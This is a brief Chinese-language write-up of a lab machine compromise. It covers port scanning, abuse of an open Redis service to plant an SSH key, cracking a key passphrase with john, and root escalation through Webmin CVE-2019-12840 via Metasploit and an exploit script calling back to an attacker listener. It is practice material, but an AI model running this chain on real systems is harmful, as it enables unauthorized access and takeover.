nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.20.206 (扫描TCP)

nmap -sU --top-ports 100 10.129.20.206 (扫描UDP)

http://10.129.20.206/#first-section

https://10.129.20.206:10000/

没有可直接地用的地方那就试试看直接登入6379,

redis-cli -h 10.129.20.206

通过上面图片我们发现我们具有写入的权限

先在本地的kali上创建密钥

ssh-keygen

使用之前的私钥进行连接

ssh -i yes redis@10.129.20.206

直接拿到SHELL

手动枚举并没有什么有用的信息

所以上传linpeas进行枚举

有个密钥可以使用ssh2john进行转换 里面有具体操作过程，可以获取到一个密码computer2008

ssh2john id_rsa > hash_key

john hash_key --wordlist=/usr/share/wordlists/rockyou.txt

computer2008

search cve-2019-12840

use 0

set RHOSTS 10.10.10.160

set PASSWORD computer2008

set USERNAME Matt

set SSL True

run

提权到ROOT权限

使用10000端口上的webmin

python 50809.py -t https://10.129.20.206:10000 -c Matt:computer2008 -LS 10.10.16.31:8001 -L 10.10.16.31 -P 3333